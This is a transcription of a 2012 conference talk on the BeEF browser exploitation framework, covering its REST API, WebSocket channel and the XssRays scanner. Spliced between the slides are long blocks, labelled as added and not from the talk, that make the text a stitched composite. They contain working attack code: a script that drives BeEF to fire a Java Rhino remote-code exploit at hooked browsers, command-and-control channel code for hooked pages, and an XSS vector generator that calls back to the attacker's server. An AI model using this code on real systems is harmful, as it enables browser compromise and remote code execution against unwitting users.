Advances in BeEF
                      RESTful API, WebSockets, XssRays




                        Michele “antisnatchor” Orru’
                        AthCon 2012 - Athens - 4 May 2012

Saturday, May 5, 12
Who am I?
   - Senior Security Consultant @ Trustwave SpiderLabs

   - BeEF lead core developer
   - Application Security researcher
   - OpenBSD, Ruby and JavaScript addict

   - @antisnatchor
   - http://antisnatchor.com

What is BeEF?
                      Browser Exploitation Framework

   Powerful platform for Client-side pwnage, XSS
   post-exploitation and generally victim browser
   security-context abuse.

   The framework allows the penetration tester to
   select specific modules (in real-time) to target
   each browser, and therefore each context.

Outline


   I.   The need to be RESTful: the new API
   II.  The need to be speedy: WebSockets support
   III. I want more XSSs: XssRays enhancements
   IV.  demos and fun :D




The need to be RESTful


       - I hate SOAP
       - I hate XML-RPC
       - I love using the protocol's (HTTP) own
         features instead of reinventing the wheel



The need to be RESTful

    Ruby + Sinatra + JSON = WIN

    require 'sinatra'

    # a Sinatra route: HTTP verb + path, block returns the body
    get '/to/a/pub' do
      "BeER please"
    end



The need to be RESTful

   - programmatically control BeEF from anything
     that speaks HTTP and JSON (bash + curl?)

   - facilitate integration with third-party tools (ZAP?)

   - build your own custom UI/GUI (mobile?)



The need to be RESTful

   More info:
   - http://blog.beefproject.com/2012/03/restful-api-from-
   antisnatchor-with-love.html
    - http://blog.beefproject.com/2012/03/restful-api-demo.html

   Read the doc, you lazy!
   - https://github.com/beefproject/beef/wiki/BeEF-RESTful-API




The need to be RESTful
             Demo time
 Pwn hooked browsers with JDK <= 1.6.0_27
 (the Rhino script engine bug, CVE-2011-3544)
 I.   get the hooked browsers' type/version/OS/plugins
 II.  if browserIsIE
        createOverlayIframe(Above)
      else
        launchManInTheBrowser
      end
 III. if javaEnabled then launchGetSystemInfo
 IV.  if JDK <= 1.6.0_27 then launchRhinoRCE
 V.   enjoy the Java Meterpreter
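The demo flow above, scripted against the RESTful API from Node.js (18+, built-in fetch) as an added example; this is not BeEF's own code and not from the talk. Endpoint paths and the `?token=` query parameter follow the BeEF RESTful API wiki linked on the previous slide. The hook-detail keys (BrowserName, JavaEnabled), the module display names, the overlay option name and the result format of Get System Info are assumptions to check against a live instance; the version comparison is the part that usually goes wrong when people script this with string compares:

```javascript
'use strict';
// Added example (not BeEF's own code): drive the BeEF RESTful API from Node.js
// (18+, built-in fetch) to reproduce the demo flow above. Endpoint paths and
// the token query parameter follow the BeEF RESTful API wiki linked on the
// previous slide. ASSUMED for illustration: the hook-detail keys BrowserName
// and JavaEnabled, the module names below, the module option name, and that
// the Get System Info result text contains a "1.6.0_27"-style version string.

const BEEF = process.env.BEEF_URL || 'http://127.0.0.1:3000';
const JDK_CEILING = '1.6.0_27';                        // slide: JDK <= 1.6.0_27
const MODULE_NAMES = {                                  // assumed display names
  overlay: 'Overlay Iframe', mitb: 'Man-In-The-Browser',
  sysinfo: 'Get System Info', rhino: 'Rhino RCE',
};

// "1.6.0_27"-style versions must be compared component-wise: a string
// comparison ranks "1.6.0_3" above "1.6.0_27".
function parseJdk(v) {
  const m = /^(\d+)\.(\d+)\.(\d+)(?:_(\d+))?/.exec(String(v).trim());
  return m ? m.slice(1).map((x) => parseInt(x || '0', 10)) : null;
}

function jdkAtMost(v, ceiling) {
  const a = parseJdk(v), b = parseJdk(ceiling);
  if (!a || !b) return false;            // unparseable: never fire the exploit blindly
  for (let i = 0; i < 4; i++) if (a[i] !== b[i]) return a[i] < b[i];
  return true;
}

// First "1.6.0_27"-like token in a module result (assumed result format).
function javaVersionFrom(text) {
  const m = /(\d+\.\d+\.\d+_\d+)/.exec(String(text));
  return m ? m[1] : null;
}

// GET /api/modules returns an object keyed by index with {id, name, category, class}.
function findModuleId(modules, name) {
  for (const m of Object.values(modules)) {
    if (m.name && m.name.toLowerCase() === name.toLowerCase()) return m.id;
  }
  throw new Error(`module not found: ${name}`);
}

const launch = (session, modules, name, body = {}) =>
  ({ method: 'POST', path: `/api/modules/${session}/${findModuleId(modules, name)}`, body });

// Steps II and III of the slide as a list of REST calls (pure, testable offline).
function phaseOne(session, details, modules) {
  const calls = [details.BrowserName === 'IE'
    ? launch(session, modules, MODULE_NAMES.overlay, { position: 'Above' })  // option name assumed
    : launch(session, modules, MODULE_NAMES.mitb)];
  if (details.JavaEnabled === 'Yes') calls.push(launch(session, modules, MODULE_NAMES.sysinfo));
  return calls;
}

// Step IV: only once the reported JDK version is known and within the ceiling.
function phaseTwo(session, javaVersion, modules) {
  return jdkAtMost(javaVersion, JDK_CEILING) ? [launch(session, modules, MODULE_NAMES.rhino)] : [];
}

async function api(token, method, path, body) {
  const url = `${BEEF}${path}${token ? `?token=${encodeURIComponent(token)}` : ''}`;
  const res = await fetch(url, {
    method, headers: { 'Content-Type': 'application/json' },
    body: body ? JSON.stringify(body) : undefined,
  });
  if (!res.ok) throw new Error(`${method} ${path}: HTTP ${res.status}`);
  return res.json();
}

async function main() {
  const { token } = await api(null, 'POST', '/api/admin/login', { username: 'beef', password: 'beef' });
  const modules = await api(token, 'GET', '/api/modules');
  const hooks = await api(token, 'GET', '/api/hooks');
  const sysId = findModuleId(modules, MODULE_NAMES.sysinfo);
  for (const h of Object.values(hooks['hooked-browsers'].online)) {       // step I
    const details = await api(token, 'GET', `/api/hooks/${h.session}`);
    let sysCmd = null;
    for (const c of phaseOne(h.session, details, modules)) {
      const r = await api(token, c.method, c.path, c.body);             // {success, command_id}
      if (c.path.endsWith(`/${sysId}`)) sysCmd = r.command_id;
    }
    if (sysCmd === null) continue;
    await new Promise((r) => setTimeout(r, 5000));                       // let the applet report back
    const result = await api(token, 'GET', `/api/modules/${h.session}/${sysId}/${sysCmd}`);
    const ver = javaVersionFrom(JSON.stringify(result));
    for (const c of phaseTwo(h.session, ver, modules)) await api(token, c.method, c.path, c.body);
    console.log(h.session, details.BrowserName, 'java', ver, jdkAtMost(ver, JDK_CEILING) ? 'exploited' : 'skipped');
  }
}

if (process.argv.includes('--live')) main().catch((e) => { console.error(e); process.exit(1); });
```

Save it as, say, beef_demo.js and run `node beef_demo.js --live` with BEEF_URL pointing at a BeEF you own. Two things to keep in mind when wrapping this API: the token travels in the query string, so it ends up in access and proxy logs, and the login defaults (beef/beef) are the first thing anyone scanning port 3000 will try, so change them before exposing the REST interface beyond localhost.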

The need to be speedy: WS

    BeEF's communication channel uses XHR-polling
      Pros:
      - works everywhere (we support IE, Chrome,
        Safari, Firefox, Opera and mobile browsers)

      Cons:
      - not efficient: every poll carries full HTTP
        headers, even when no command is queued



The need to be speedy: WS
                      Meet WebSocket support in BeEF

          (diagram: XHR-polling channel vs. WebSockets channel)

The need to be speedy: WS

   if beef.browser.hasWebSocket()
        don't use XHR-polling, open a WebSocket channel instead

   currently supported: Firefox, Chrome, Safari
       also via MozWebSocket (damn vendor prefixes #$*(%$)

   speaks hixie-75, hixie-76, hybi-07 and hybi-10 (the protocol
   drafts those browsers shipped at the time; the server has to
   handle whichever one the hooked browser talks)
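Channel selection as the slide describes it, written as an added example (this is not the BeEF hook's own code): feature detection including the Mozilla prefix, one interface over both transports, and the XHR-polling fallback. The window object and the XHR wrapper are injected so the logic runs under Node; the URLs in `opts` and the `{id, js}` / `{id, result}` JSON shapes are assumptions:

```javascript
'use strict';
// Added example, not BeEF's own hook code: pick the command channel the way
// the slide describes (WebSocket when the browser has one, XHR-polling
// otherwise) behind a single interface, so modules never care which transport
// is underneath. `win` and the XHR wrapper are injected instead of using the
// globals so the logic runs (and is tested) under Node. ASSUMED: the URLs in
// `opts` and the JSON shape {id, js} for commands and {id, result} for replies.

// Firefox 6 to 10 exposed only the prefixed constructor.
function hasWebSocket(win) {
  return typeof win.WebSocket === 'function' || typeof win.MozWebSocket === 'function';
}

// opts: { wsUrl, pollUrl, resultUrl, interval, xhr(method, url, body, cb) }
function openChannel(win, opts) {
  const handlers = [];
  const dispatch = (msg) => handlers.forEach((h) => h(msg));

  if (hasWebSocket(win)) {
    const Ctor = win.WebSocket || win.MozWebSocket;
    const ws = new Ctor(opts.wsUrl);       // one persistent, full-duplex connection
    ws.onmessage = (ev) => dispatch(JSON.parse(ev.data));
    return {
      kind: 'websocket',
      onCommand: (fn) => handlers.push(fn),
      send: (obj) => ws.send(JSON.stringify(obj)),
      close: () => ws.close(),
    };
  }

  // Fallback: one GET per interval asking for queued commands, one POST per
  // result. Every poll carries full HTTP headers even when nothing is queued,
  // which is exactly the overhead the WebSocket channel removes.
  const timer = win.setInterval(() => {
    opts.xhr('GET', opts.pollUrl, null, (text) => {
      if (text) JSON.parse(text).forEach((msg) => dispatch(msg));
    });
  }, opts.interval || 1000);
  return {
    kind: 'xhr-polling',
    onCommand: (fn) => handlers.push(fn),
    send: (obj) => opts.xhr('POST', opts.resultUrl, JSON.stringify(obj), () => {}),
    close: () => win.clearInterval(timer),
  };
}

// Wire a module runner to a channel: run each command, ship back {id, result}.
// `run` is whatever executes module JS in the hooked page; injected here.
function attachRunner(channel, run) {
  channel.onCommand((cmd) => {
    let reply;
    try { reply = { id: cmd.id, result: run(cmd) }; }
    catch (e) { reply = { id: cmd.id, error: String(e) }; }
    channel.send(reply);
  });
}
```

From the blue-team side the two transports look quite different on the wire: XHR-polling is a regular, periodic request to the same URL (a classic beacon), while the WebSocket channel is a single long-lived TCP connection after one HTTP Upgrade handshake. Detections keyed on beacon periodicity see the first and miss the second, so a proxy that logs or inspects Upgrade requests matters once hooks start using WebSockets.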



The need to be speedy: WS

  still experimental in BeEF (bug-fixing/testing phase)
       clone https://github.com/radoen/beef-radoen to give it a try

  opens up a whole new range of possible features
       - real-time, VNC-like control of the hooked browser
       - faster Tunneling Proxy (fuzzing through the hooked
         browser is 4 to 5 times faster)
       - generally faster communication



The need to be speedy: WS
          demo time


    - launch 1000 return_long_string modules over
      plain XHR-polling and again over WebSockets,
      and compare how long each run takes




I want more XSSs:
                           XssRays
 Originally developed by Gareth Heyes in 2009 as a pure
 JavaScript XSS scanner, later integrated into BeEF.

 XssRays parses all the links and forms of the page it is
 loaded in and checks for XSS in GET and POST parameters,
 and also in the URI path, by creating hidden iFrames.

 Who uses FrameBusting/X-Frame-Options out there :-)?
 (a target that refuses to be framed is a scan we cannot run)


I want more XSSs:
                           XssRays
 We inject a vector that contacts BeEF back only if the JS
 code actually executes (and thus the XSS is confirmed).
 This also means the results are free of false positives.

 False negatives are possible, since we inject vectors
 blindly (no parsing of the response).

 Concretely, the document.location.href of the injected
 iFrame that carries the vector is pointed at a known BeEF
 resource, so the callback shows up on the BeEF side.

I want more XSSs:
                           XssRays

    It also works cross-domain
        (respecting the SOP)



I want more XSSs:
                           XssRays
   Enhancements from previous months:
     - added more attack vectors
          double URL encoded, double nibble, DOM-based injections

     - added Chrome/Safari support
          base64'ing the iFrame src in order to bypass the XSS filter
          (the WebKit XSS Auditor)

     - added IE6 to IE9 support
          did you know that in IE6 location.pathname doesn't contain the
          leading forward slash? (thanks Gareth)
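The three XssRays slides above (link/form parsing into hidden iFrames, the callback-confirmed vector, and the added encodings) in one added example; it is not XssRays' own code. Node's URL class stands in for the browser's, and the DOM walk that collects forms is replaced by a `forms` argument. The callback path /xssrays/check with a `ray` id parameter, and the base64 data: URI as the way to carry a POST ray inside an iframe, are assumptions:

```javascript
'use strict';
// Added example, not XssRays' own code: the ray-generation and confirmation
// logic of a blind, callback-confirmed XSS scan as the slides describe it.
// A "ray" is one request carrying a vector which, if the target reflects it
// unescaped and the browser runs it, navigates the hidden iframe to a known
// BeEF URL; seeing that request is the confirmation, so there are no false
// positives. Node's URL class stands in for the browser's. ASSUMED for
// illustration: the callback path /xssrays/check and its `ray` id parameter;
// the base64 data: URI is one way to carry a POST ray in an iframe.

const CALLBACK_PATH = '/xssrays/check';

// Encodings tried per parameter. Double-nibble re-encodes each hex digit of
// %XX, so "<" (%3C) becomes %%33%43: one decode pass yields %3C, a second "<".
const encoders = {
  plain: (s) => s,
  urlencode: (s) => encodeURIComponent(s),
  doubleUrl: (s) => encodeURIComponent(encodeURIComponent(s)),
  doubleNibble: (s) => encodeURIComponent(s).replace(/%([0-9A-F])([0-9A-F])/g,
    (_, h, l) => `%%${h.charCodeAt(0).toString(16)}%${l.charCodeAt(0).toString(16)}`),
};

// The vector: break out of an attribute or tag, then send the frame to BeEF
// tagged with the ray id so the server knows which request/parameter fired.
function vectorFor(beefUrl, rayId) {
  return `'"><script>location.href='${beefUrl}${CALLBACK_PATH}?ray=${rayId}'</script>`;
}

// GET rays for every query parameter (one per encoding), the path, and the
// fragment (DOM-based: only reaches sinks that read location.hash).
// `forms` is what a DOM walk would collect: [{action, fields:[names]}] -> POST rays.
function raysFor(pageUrl, beefUrl, forms = [], startId = 1) {
  const u = new URL(pageUrl);
  const rays = [];
  let id = startId;
  for (const name of new Set(u.searchParams.keys())) {
    for (const [encoding, enc] of Object.entries(encoders)) {
      const rid = id++;
      const q = [...u.searchParams].map(([k, v]) =>
        k === name ? `${k}=${enc(vectorFor(beefUrl, rid))}` : `${k}=${encodeURIComponent(v)}`).join('&');
      rays.push({ id: rid, method: 'GET', param: name, encoding, url: `${u.origin}${u.pathname}?${q}` });
    }
  }
  const pathId = id++;
  rays.push({ id: pathId, method: 'GET', param: '<path>', encoding: 'urlencode',
    url: `${u.origin}${u.pathname.replace(/\/?$/, '/')}${encodeURIComponent(vectorFor(beefUrl, pathId))}${u.search}` });
  const hashId = id++;
  rays.push({ id: hashId, method: 'GET', param: '<fragment>', encoding: 'plain',
    url: `${u.origin}${u.pathname}${u.search}#${vectorFor(beefUrl, hashId)}` });
  for (const f of forms) {
    for (const field of f.fields) {
      const rid = id++;
      rays.push({ id: rid, method: 'POST', param: field, encoding: 'plain',
        action: new URL(f.action, pageUrl).href,
        data: Object.fromEntries(f.fields.map((n) => [n, n === field ? vectorFor(beefUrl, rid) : 'x'])) });
    }
  }
  return rays;
}

// Hidden-iframe carrier. GET rays just use the URL; a POST ray is wrapped in a
// self-submitting form served from a base64 data: URI (assumed technique).
function iframeSrcFor(ray) {
  if (ray.method === 'GET') return ray.url;
  const esc = (s) => s.replace(/&/g, '&amp;').replace(/"/g, '&quot;');
  const inputs = Object.entries(ray.data)
    .map(([k, v]) => `<input type="hidden" name="${esc(k)}" value="${esc(v)}">`).join('');
  const html = `<form id="f" method="POST" action="${esc(ray.action)}">${inputs}</form>` +
    '<script>document.getElementById("f").submit()</script>';
  return 'data:text/html;base64,' + Buffer.from(html, 'utf8').toString('base64');
}

// BeEF side: match callback hits (request URLs BeEF served) back to rays.
function confirmRays(rays, hitUrls, beefUrl) {
  const byId = new Map(rays.map((r) => [r.id, r]));
  const confirmed = [];
  for (const hit of hitUrls) {
    const h = new URL(hit, beefUrl);
    if (h.pathname !== CALLBACK_PATH) continue;
    const r = byId.get(Number(h.searchParams.get('ray')));
    if (r && !confirmed.includes(r)) confirmed.push(r);
  }
  return confirmed;
}
```

Two caveats a practitioner should carry over from the slides: a ray only proves something when the iframe actually renders, so X-Frame-Options or frame-busting on the target turns every ray into a false negative rather than an error, and the callback has to reach BeEF from the hooked browser's network position, so a target on an internal network with no route to the BeEF host never confirms anything even if the injection worked.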


Thanks
   Thanks to my BeEFfy friends: Wade, Christian, Brendan,
   Javier, Saafan, Graziano, Ben W., Ben P., Pipes and anyone I may
   have forgotten

   Our new blogger Heather P.

   SpiderLabs because I don’t have to take holidays to be here

   Special thanks to Kyprianos and Chris


Thanks
                      follow us: @beefproject
                      main site: http://beefproject.com
                      the new blog: http://blog.beefproject.com
                      github page: https://github.com/beefproject/beef




                             (Please note: we’ll not pay you. You know we love OpenSource :-)
Questions?




